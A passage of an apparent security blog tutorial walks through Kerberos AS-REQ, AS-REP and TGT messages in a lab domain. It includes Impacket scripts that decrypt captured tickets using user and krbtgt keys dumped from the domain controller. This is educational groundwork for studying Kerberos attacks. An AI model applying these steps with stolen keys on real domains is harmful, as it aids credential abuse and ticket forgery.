size-large wp-image-590\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-9.02.01-PM-1024x636.png\" alt=\"\" width=\"1024\" height=\"636\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-590\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-9.02.01-PM-1024x636.png\" alt=\"\" width=\"1024\" height=\"636\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-9.02.01-PM-1024x636.png 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-9.02.01-PM-300x186.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-9.02.01-PM-768x477.png 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-9.02.01-PM-1536x953.png 1536w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-9.02.01-PM.png 1666w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/noscript><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">host=alerter,appmgmt,cisvc,clipsrv,browser,dhcp,dnscache,replicator,eventlog,eventsystem,policyagent,oakley,\r\ndmserver,dns,mcsvc,fax,msiserver,ias,messenger,netlogon,netman,netdde,netddedsm,nmagent,plugplay,protectedstorage,\r\nrasman,rpclocator,rpc,rpcss,remoteaccess,rsvp,samss,scardsvr,scesrv,seclogon,scm,dcom,cifs,spooler,snmp,schedule,\r\ntapisrv,trksvr,trkwks,ups,time,wins,www,http,w3svc,iisadmin,msdt<\/pre>\n<p>So don&#8217;t get confused when you find the &#8220;host&#8221; SPN at Wireshark while connecting to some services.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"Summary\"><\/span>Summary<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>SPNs are used when authenticating to any service using Kerberos, the service must have a 
registered SPN in order for Kerberos to be used for authentication.<br \/>\nSPN&#8217;s format is ServiceClass\/host:port<\/p>\n<h1><span class=\"ez-toc-section\" id=\"Kerberos_authentication\"><\/span>Kerberos authentication<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<h2><span class=\"ez-toc-section\" id=\"Setting_up\"><\/span>Setting up<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Assume user jnkfo\\win10user need to connect to SMB service at win10.jnkfo.lab, I will use Impacket to do so and Wireshark to track everything<\/p>\n<p>The following code will do so<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">from impacket.smbconnection import SMBConnection\r\nsmbconn = SMBConnection(\"win10.jnkfo.lab\", \"192.168.18.10\")\r\nlogin = smbconn.kerberosLogin(\"win10user\", \"P@ssw0rd\", \"jnkfo.lab\", \"\",\"\",\"\", kdcHost=\"192.168.18.2\")\r\nprint login<\/pre>\n<p>Hostname : win10.jnkfo.lab<br \/>\nHost IP: 192.168.18.10<br \/>\nusername: win10user<br \/>\nDomain name: jnkfo.lab<br \/>\nKDC Host (Domain controller) : 192.168.18.2<\/p>\n<p>Before executing the code, launch Wireshark and use the following filter &#8220;<strong>kerberos or smb or smb2<\/strong>&#8221; to track just the smb and Kerberos packets<\/p>\n<p class=\"p1\">Once u execute the command, you will see some packets in Wireshark<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-592\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-24-at-4.24.04-PM-1024x485.png\" alt=\"\" width=\"1024\" height=\"485\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-592\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-24-at-4.24.04-PM-1024x485.png\" alt=\"\" width=\"1024\" height=\"485\" 
srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-24-at-4.24.04-PM-1024x485.png 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-24-at-4.24.04-PM-300x142.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-24-at-4.24.04-PM-768x364.png 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-24-at-4.24.04-PM-1536x728.png 1536w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-24-at-4.24.04-PM-2048x970.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/noscript><\/p>\n<p>Once you got that, we&#8217;re ready to go.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"In_a_nutshell\"><\/span>In a nutshell<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Let&#8217;s split the connection into 2 parts,<br \/>\n1 &#8211; Client &lt;&#8212;-&gt; KDC<br \/>\n2 &#8211; Client &lt;&#8212;-&gt; Service<\/p>\n<p>I won&#8217;t discuss the SMB negotiation here, it&#8217;s already discussed in the previous part, we&#8217;re more interested in the Kerberos auth process.<br \/>\nFirst, the client is contacting the KDC to retrieve a ticket, Then, the client presents that ticket to the service, as proof of his identity.<\/p>\n<p>The 1st part (Client &lt;&#8212;-&gt; KDC) involves the following<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-593\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/4.png\" alt=\"\" width=\"866\" height=\"417\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-593\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/4.png\" alt=\"\" width=\"866\" height=\"417\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/4.png 866w, 
https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/4-300x144.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/4-768x370.png 768w\" sizes=\"auto, (max-width: 866px) 100vw, 866px\" \/><\/noscript><\/p>\n<p><strong>1 &#8211; AS-REQ<\/strong> <strong>(Authentication request)<\/strong>:<\/p>\n<p>The client hashes the user&#8217;s password, uses that hash to encrypt the current timestamp, and sends the encrypted timestamp to the KDC.<br \/>\nThe KDC already has a copy of the user&#8217;s hash so it uses the hash and tries to decrypt that message to retrieve the timestamp.<br \/>\nIf the decryption is successful, then the KDC knows that the client used the correct hash\u00a0and hence proved his identity to that KDC<\/p>\n<p><strong>2 &#8211; AS-REP (Authentication reply)<\/strong>: The Authentication service (AS) replies with two messages<br \/>\nA &#8211; A session key encrypted using the user&#8217;s hash, that key will be used for future messages.<br \/>\nB &#8211; TGT (ticket-granting ticket), That TGT contains information regarding the user and his privileges on the domain, This message is encrypted using the hash of the KRBTGT account\u2019s password. That hash is known only to the KDC, so only the KDC can decrypt the TGT.<\/p>\n<p><strong>3 &#8211; TGS-REQ (Ticket Granting Service request): <\/strong>The client now has the TGT, he then requests a ticket to access the service he wants, so the client encrypts that request using the session key and sends it to the KDC which will decrypt and validate it. 
The TGT is also sent in that request.<\/p>\n<p><strong>4 &#8211; TGS-REP:<\/strong> After validating the TGT, the KDC responds with two messages<br \/>\nA &#8211; A message specialized for the targeted service, encrypted with the service&#8217;s hash which is stored at the KDC; this includes the information in the TGT as well as a session key<br \/>\nB &#8211; A message for the client containing a session key for further requests between the client and the service he asked to access, which is encrypted using the key retrieved from the AS-REP step.<\/p>\n<p>The 2nd part Client &lt;&#8212;-&gt; Service<br \/>\nThe client presents the message (TGS) from the TGS-REP step while connecting to the service, along with an encrypted part called the authenticator message; this part includes the user&#8217;s name and a timestamp, encrypted with the service session key, which the service uses to decrypt it.<br \/>\nThe service then compares the username and timestamp from the TGS with the username and timestamp from the authenticator message.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-579\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/2.jpg\" alt=\"\" width=\"776\" height=\"171\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-579\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/2.jpg\" alt=\"\" width=\"776\" height=\"171\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/2.jpg 744w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/2-300x66.jpg 300w\" sizes=\"auto, (max-width: 776px) 100vw, 776px\" \/><\/noscript><\/p>\n<p>That&#8217;s how Kerberos works without digging deep, but that&#8217;s not enough AT ALL to understand Kerberos attacks.<br \/>\nIt&#8217;s better to dig deeper into each message: how it works, the information it contains, and what each piece of information is used for.<br \/>\nThat&#8217;s what I will be discussing using the packets I captured earlier<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-594\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/5-1024x204.png\" alt=\"\" width=\"1024\" height=\"204\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-594\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/5-1024x204.png\" alt=\"\" width=\"1024\" height=\"204\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/5-1024x204.png 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/5-300x60.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/5-768x153.png 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/5.png 1125w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/noscript><\/p>\n<h2><span class=\"ez-toc-section\" id=\"Pre_AS-REQ\"><\/span>Pre AS-REQ<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p><strong>1 &#8211;<\/strong> The client tries to send an AS-REQ message to the KDC containing the following information<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-597\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/6-1-1024x673.png\" alt=\"\" width=\"1024\" height=\"673\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-597\" 
src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/6-1-1024x673.png\" alt=\"\" width=\"1024\" height=\"673\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/6-1-1024x673.png 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/6-1-300x197.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/6-1-768x505.png 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/6-1.png 1115w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/noscript><\/p>\n<p><strong>The 1st part includes<\/strong><\/p>\n<ul>\n<li>The message type or the Application class tag number (10)<\/li>\n<li>Kerberos version (pvno = 5)<\/li>\n<li>The padata, which contains pre-authentication data of type <strong>128<\/strong> (PA-PAC-REQUEST); this tells the KDC whether the client wants a PAC included in the ticket. In this case you&#8217;ll find that Kerberos.include_pac is true, which means &#8220;no PAC is present yet, include the PAC&#8221;<\/li>\n<\/ul>\n<p><strong>The 2nd part<\/strong> includes the ticket flags or attributes<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-598\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/7.png\" alt=\"\" width=\"768\" height=\"784\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-598\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/7.png\" alt=\"\" width=\"768\" height=\"784\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/7.png 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/7-294x300.png 294w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/noscript><\/p>\n<ul>\n<li>forwardable: The ticket can be forwarded. This flag is typically set during the AS exchange and is used by the TGS when issuing tickets.<\/li>\n<li>proxiable: The ticket can be sent to a proxy and used by a 
proxy.<\/li>\n<li>renewable: The client can request to have the ticket renewed instead of having a new ticket issued when the current one expires<\/li>\n<\/ul>\n<p><strong>The 3rd part includes<\/strong><\/p>\n<ul>\n<li>CnameString: the username we&#8217;re using to log in, &#8220;<strong>win10user<\/strong>&#8221;<\/li>\n<li>realm: the uppercase full name of the domain we&#8217;re logging in to, &#8220;jnkfo.lab&#8221;<\/li>\n<\/ul>\n<p><strong>The 4th part includes<\/strong><\/p>\n<ul>\n<li>SnameString: the name of the Kerberos service we need (krbtgt in that case)<\/li>\n<li>realm: the uppercase full name of the domain, &#8220;jnkfo.lab&#8221;<\/li>\n<\/ul>\n<p><strong>The 5th part includes<\/strong> the encryption algorithm which will be used (AES256 in this case)<\/p>\n<p><span style=\"color: #ff0000;\">The full message is in plaintext, no secrets are shared at all<\/span><\/p>\n<h2><span class=\"ez-toc-section\" id=\"KRB5KDC_ERR_PREAUTH_REQUIRED\"><\/span><strong>KRB5KDC_ERR_PREAUTH_REQUIRED<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>The KDC responds to the client that it needs more information to prove that he owns the password (key) of the user he&#8217;s authenticating as;<br \/>\nthat&#8217;s the part in which the user&#8217;s password or hash is needed.<br \/>\nYou&#8217;ll find many of the old parameters included in the message already, but some new parameters are sent to the client<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-599\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/8-1024x674.png\" alt=\"\" width=\"1024\" height=\"674\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-599\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/8-1024x674.png\" alt=\"\" width=\"1024\" 
height=\"674\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/8-1024x674.png 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/8-300x197.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/8-768x505.png 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/8.png 1067w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/noscript><\/p>\n<ul>\n<li>stime: The current server time<\/li>\n<li>susec: The server&#8217;s timestamp in microseconds<\/li>\n<li>salt: JNKFO.LABwin10user<\/li>\n<li>And obviously the error code<\/li>\n<\/ul>\n<h2><span class=\"ez-toc-section\" id=\"AS-REQ\"><\/span>AS-REQ<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>From now on you&#8217;ll notice that there is an encrypted part and a plaintext part; this will be obvious in a few seconds.<br \/>\nIn this step, the user&#8217;s hash will be used to encrypt the timestamp and send it to the KDC. The packet includes<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-600\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/9.png\" alt=\"\" width=\"1009\" height=\"705\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-600\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/9.png\" alt=\"\" width=\"1009\" height=\"705\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/9.png 1009w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/9-300x210.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/9-768x537.png 768w\" sizes=\"auto, (max-width: 1009px) 100vw, 1009px\" \/><\/noscript><\/p>\n<p>This request includes everything in the 1st AS-REQ message including<\/p>\n<ul>\n<li>Cname: already discussed, contains the client principal name (win10user@JNKFO.LAB)<\/li>\n<li>Sname: already 
discussed, contains the service principal name (krbtgt@JNKFO.LAB)<\/li>\n<\/ul>\n<p>and more importantly, the encrypted timestamp part which can be found in the <strong>cipher<\/strong> field.<br \/>\nThe value is : e881a392d5eb0f57f7cd023a5b6eaaf5df73c023011fa8837e501769417a90c3ed73372c689c930881129b913904cde1c908fa7469775e39<br \/>\netype: the encryption type used while encrypting the timestamp, which is AES256<\/p>\n<p>To decrypt that message we need to get the AES256 key for the user, then use it to decrypt the cipher.<br \/>\nThe following code will help<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\">from binascii import unhexlify, hexlify\r\nfrom impacket.krb5.crypto import Key, _enctype_table, InvalidChecksum\r\nfrom pyasn1.codec.der import decoder, encoder\r\n# etype 18 = aes256-cts-hmac-sha1-96\r\ncipher = _enctype_table[18]\r\npassword = \"P@ssw0rd\"\r\n# salt as returned in KRB5KDC_ERR_PREAUTH_REQUIRED: uppercase realm + username\r\nsalt = \"JNKFO.LABwin10user\"\r\n# derive the user's AES256 key from the password and salt\r\nkey = cipher.string_to_key(password, salt, None)\r\n#hexlify(key.contents)\r\n# the cipher field of the PA-ENC-TIMESTAMP padata captured above\r\nmycipher = \"e881a392d5eb0f57f7cd023a5b6eaaf5df73c023011fa8837e501769417a90c3ed73372c689c930881129b913904cde1c908fa7469775e39\"\r\n# key usage 1 = AS-REQ PA-ENC-TIMESTAMP (RFC 4120); a wrong key raises InvalidChecksum\r\nenctimestamp = cipher.decrypt(key, 1, unhexlify(mycipher))\r\n# DER-decode the PA-ENC-TS-ENC structure (patimestamp, pausec)\r\ndec = decoder.decode(enctimestamp)\r\nfor i in dec:\r\n    print(i)\r\n<\/pre>\n<p>This will produce the following output, which is the clear text timestamp<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">Sequence:\r\n field-0=20200424142303Z\r\n field-1=197279\r\n<\/pre>\n<p>The message is sent to the KDC which will proceed with the authentication process<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-601\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/10.png\" alt=\"\" width=\"791\" height=\"205\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-601\" 
src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/10.png\" alt=\"\" width=\"791\" height=\"205\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/10.png 791w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/10-300x78.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/10-768x199.png 768w\" sizes=\"auto, (max-width: 791px) 100vw, 791px\" \/><\/noscript><\/p>\n<h2><span class=\"ez-toc-section\" id=\"AS-REP\"><\/span>AS-REP<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>The KDC has a copy of the user&#8217;s key, so if the user encrypted the timestamp using the correct key, the KDC will be able to decrypt it, and hence the KDC is assured that the client used the user&#8217;s correct password.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-602\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/11.png\" alt=\"\" width=\"613\" height=\"271\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-602\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/11.png\" alt=\"\" width=\"613\" height=\"271\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/11.png 613w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/11-300x133.png 300w\" sizes=\"auto, (max-width: 613px) 100vw, 613px\" \/><\/noscript><\/p>\n<p>Once this step is done the KDC generates a random session key and sends the <strong>AS-REP (Authentication reply)<\/strong>, which contains 2 messages<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-603\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/12.png\" alt=\"\" width=\"986\" height=\"643\" \/><noscript><img 
loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-603\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/12.png\" alt=\"\" width=\"986\" height=\"643\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/12.png 986w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/12-300x196.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/12-768x501.png 768w\" sizes=\"auto, (max-width: 986px) 100vw, 986px\" \/><\/noscript><\/p>\n<h3><span class=\"ez-toc-section\" id=\"Message_A\"><\/span>Message A<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>This message is encrypted using the user&#8217;s secret key, and so it can be decrypted and read by the user.<br \/>\nThe message contains the following information<\/p>\n<ul>\n<li>TGS session key<\/li>\n<li>TGS name<\/li>\n<li>Timestamp<\/li>\n<li>Lifetime<\/li>\n<\/ul>\n<p>We can decrypt and read this data using win10user&#8217;s key; let&#8217;s get the key directly from the DC instead of generating it from the plaintext password<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-604\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/13.png\" alt=\"\" width=\"780\" height=\"621\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-604\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/13.png\" alt=\"\" width=\"780\" height=\"621\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/13.png 780w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/13-300x239.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/13-768x611.png 768w\" sizes=\"auto, (max-width: 780px) 100vw, 780px\" \/><\/noscript><\/p>\n<p>The etype in the packet is 18, meaning we will need the AES256 key.<br \/>\nUsing the following script to decrypt the 
cipher in message A will help us understand what&#8217;s going on<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\">from pyasn1.codec.der import decoder, encoder\r\nfrom binascii import unhexlify, hexlify\r\nfrom impacket.krb5.crypto import Key, _enctype_table, InvalidChecksum\r\n# etype 18 = aes256-cts-hmac-sha1-96\r\ncipher = _enctype_table[18]\r\n# win10user's AES256 key as dumped from the DC\r\nkey = Key(18, unhexlify(\"1ed620f476644bb555227e913400edf446980824f60564ee4bd3430ca34981c1\"))\r\n# the enc-part cipher of the AS-REP\r\nmycipher = \"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\"\r\n# key usage 3 = AS-REP enc-part encrypted with the client key (RFC 4120)\r\njnk = cipher.decrypt(key, 3, unhexlify(mycipher))\r\n# DER-decode the EncASRepPart structure\r\ndec = decoder.decode(jnk)\r\nfor i in dec:\r\n  print(i)<\/pre>\n<p>The output is<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">Sequence:\r\n field-0=Sequence:\r\n  field-0=18\r\n  field-1=0x64586df7e4620c197c1889f84d3aa825c4c6060d12633a83bfc9af11f5fdab64\r\n\r\n field-1=SequenceOf:\r\n  Sequence:\r\n   field-0=0\r\n   field-1=20200424142303Z\r\n\r\n field-2=755736468\r\n field-3=20200524145835Z\r\n field-4=1356922880\r\n field-5=20200424142303Z\r\n field-6=20200424142303Z\r\n field-7=20200425002303Z\r\n field-8=20200425142303Z\r\n field-9=JNKFO.LAB\r\n field-10=Sequence:\r\n  field-0=1\r\n  field-1=SequenceOf:\r\n   krbtgt   JNKFO.LAB\r\n<\/pre>\n<p>You will notice some familiar fields, such as<\/p>\n<ul>\n<li>The TGS service name: krbtgt<\/li>\n<li>Realm: jnkfo.lab<\/li>\n<li><strong>Session key<\/strong> : <span style=\"color: #ff0000;\">0x64586df7e4620c197c1889f84d3aa825c4c6060d12633a83bfc9af11f5fdab64<\/span><\/li>\n<li>Timestamp: 20200424142303<\/li>\n<\/ul>\n<h3><span class=\"ez-toc-section\" id=\"Message_B_TGT\"><\/span>Message B (TGT)<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-605\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/14.png\" alt=\"\" width=\"715\" height=\"245\" 
\/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-605\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/14.png\" alt=\"\" width=\"715\" height=\"245\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/14.png 715w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/14-300x103.png 300w\" sizes=\"auto, (max-width: 715px) 100vw, 715px\" \/><\/noscript><\/p>\n<p>This includes a plaintext part that contains the SPN (TGS name &lt;krbtgt&gt;) and an encrypted part which makes up the Ticket Granting Ticket (TGT).<\/p>\n<p>The 2nd part (enc-part) contains the following information<\/p>\n<ul>\n<li>Username<\/li>\n<li>Realm<\/li>\n<li>Session key<\/li>\n<li>Timestamp<\/li>\n<li>Lifetime<\/li>\n<\/ul>\n<p>That part is encrypted using the krbtgt key, which only the KDC knows, and so only the KDC can decrypt this part.<br \/>\nWe can get the krbtgt key using the same method explained at Message A, and so we can decrypt that cipher using the following code<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\">from pyasn1.codec.der import decoder, encoder\r\nfrom binascii import unhexlify, hexlify\r\nfrom impacket.krb5.crypto import Key, _enctype_table, InvalidChecksum\r\n# etype 18 = aes256-cts-hmac-sha1-96\r\ncipher = _enctype_table[18]\r\n# the krbtgt account's AES256 key as dumped from the DC\r\nkey = Key(18, unhexlify(\"8b4b161245435ee310d420c195995f2d22b88c680dae09196cd29e4e05723638\"))\r\n# the enc-part cipher of the ticket (TGT) in the AS-REP\r\nmycipher = \"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\"\r\n# key usage 2 = ticket enc-part encrypted with the service (here krbtgt) key (RFC 4120)\r\njnk = cipher.decrypt(key, 2, unhexlify(mycipher))\r\n# DER-decode the EncTicketPart structure\r\ndec = decoder.decode(jnk)\r\nfor i in dec:\r\n  print(i)<\/pre>\n<p>Output is<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">Sequence:\r\n field-0=1356922880\r\n field-1=Sequence:\r\n  field-0=18\r\n  field-1=0x64586df7e4620c197c1889f84d3aa825c4c6060d12633a83bfc9af11f5fdab64\r\n\r\n field-2=JNKFO.LAB\r\n field-3=Sequence:\r\n  field-0=1\r\n  field-1=SequenceOf:\r\n   win10user\r\n\r\n field-4=Sequence:\r\n  field-0=0\r\n  field-1=\r\n\r\n 
